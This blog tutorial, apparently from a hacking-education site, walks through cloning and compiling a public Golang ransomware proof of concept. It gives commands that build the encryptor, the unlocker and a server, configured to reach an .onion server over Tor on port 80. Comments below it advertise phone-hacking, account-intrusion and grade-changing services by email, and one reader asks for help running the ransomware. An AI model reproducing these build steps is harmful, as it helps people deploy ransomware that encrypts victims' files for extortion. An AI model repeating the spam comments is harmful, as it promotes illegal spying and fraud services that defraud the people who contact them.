top of page
Search
  • Writer's pictureotw

Ransomware: Build Your Own Ransomware, Part 1

Welcome back, my aspiring cyberwarriors!


Ransomware is rapidly becoming the most important form of malware afflicting our digital systems. Companies across the globe are being hit with various forms of malware including the new variant, Snake, designed specifically for SCADA/ICS systems. The Colonial Pipeline in the US was shutdown for nearly a week before paying a $5 million ransom, demonstrating the danger of this ransomware to industrial systems and a nation's infrastructure. Recently, the major US insurance company, CNA, admitted to having paid a ransom of $40 million! No wonder ransomware developers are getting more and more creative and malicious, ransomware pays!





To better understand how ransomware works, let's build our own ransomware from a Proof of Concept (POC) available from mauri870 on github.com. He developed this ransomware as part of his academic program and it is not designed for malicious purposes but rather to help us understand how ransomware works. Like the new variant, Snake, and a growing number of malware strains, this malware is written in Golang.


This malware encrypts the files in the background with AES-256-CTR and uses RSA-4096 to secure the data exchange with the server. This ransomware is very similar to Cryptolocker, one of the most successful ransomware attacks in history.


Step #1: Download and Install the Binaries


The first step is to fire up your Kali and make certain that golang is installed. If not, download it from the Kali repositories by entering;


kali > sudo apt install golang


Next, you will need to login to the root user.


kali > sudo su -


Now create a directory for the binaries. In this case, I named it simply "git".


kali >mkdir git


Next, change directory (cd) to this directory.


kali > cd git


Next, download the binaries from github.com.


kali > git clone https://github.com/mauri870/ransomware



Step #2: Export GO Environment variables


Next, we need to set some environment variables to direct the binaries and GO to the appropriate directories.




Step #3: Make the source code dependencies


Now, with the variables set and exported, we need to make the dependencies. Navigate to the new directory, ransomware, and enter make deps.


kali > cd ransomware


kali > make deps




Step #4: Make the Source Code with options


Now that we have completed the deps make, we can begin to make the source code. In our case, we will use a few options.


First, we want to use ToR to encrypt our communications over the ToR network.


USE_TOR=true


Second, we want to use our dark web server at hackersarisegtdj.onion (you can use any domain or localhost).


SERVER_HOST=hackersarisegtdj.onion


Third, we want to use port 80 (you can use any port).


SERVER_PORT=80


Finally, we want to set the operating system to compile the source code for our operating system, in this case, Linux.


GOOS=linux


Our command should look something like this;


kali > make -e USE_TOR=true SERVER_HOST=hackersarisegtdj.onion SERVER_PORT=80 GOOS=linux


Now hit ENTER and watch your ransomware compile.


Step #5: Check the Directory for ransomware.exe


Once the source code has been generated, do a long listing on the ransomware directory.


kali > ls -l

Now, navigate to the bin directory.


kali > cd bin

Here, you will see the ransomware.exe, the server and unlocker.exe.


Step #6: Examine the Types of Files to be Encrypted


If you want to see what types of files this ransomware will encrypt, navigate to cmd directory and open common.go


kali > cd cmd


kali > more common.go


Here, you can see the file extensions that this ransomware will target to encrypt when executed.



Summary


Ransomware is probably the greatest threat to our digital systems at this moment. As the Colonial Pipeline attack clearly demonstrated, nearly everyone is vulnerable and if SCADA/ICS systems are compromised there can be significant economic and infrastructure ramifications!


This POC of ransomware will help you to better understand ransomware as a threat and test to see whether your systems are vulnerable to such an attack.


In the second part of this series, we will test this ransomware on a Windows VM.


If you want or your team to learn more about ransomware, our Ransomware training videos are available in our online store.







Recent Posts

See All

3 Comments


astriddavina54
astriddavina54
Jan 03, 2023

Do you suspect your spouse of cheating, are you being overly paranoid or seeing signs of infidelity…Then he sure is cheating: I was in that exact same position when I met Henry through my best friend James who helped me hack into my boyfriend’s phone, it was like a miracle when he helped me clone my boyfriend’s phone and I got first-hand information from his phone. Now I get all his incoming and outgoing text messages, emails, call logs, web browsing history, photos and videos, instant messengers(facebook, whatsapp, bbm, IG etc) , GPS locations, phone taps to get live transmissions on all phone conversations. if you need help contact his gmail on , Henryclarkethicalhacker@gmail.com, and you can also , whatsap…


Like

Hey everyone , I don’t really know much about this hacking things but I can direct you to a professional hacking company who helped me to track and hack my boyfriend’s iPhone and his Facebook respectively.. If you need to check on your partner’s sincerity, employee’s honesty, recover your email passwords, Social networks (i.e Facebook, Twitter, IG), change your school grades, clear your criminal records, gain access to bank accounts,spy on phone. you can just contact them at … Their charges are minimal and negotiable contact them at Henryclarkethicalhacker @ gmail, com]..tell him you are from me or text him or whatsapp +1 8 1 3 4 2 1 1 3 2 6…. You can thank me later.


Like

thanks very much sir this will help me in my college project for sure i was finding content like this can you write how to safely run it on window and make it normal without any damage pls sir

Like
bottom of page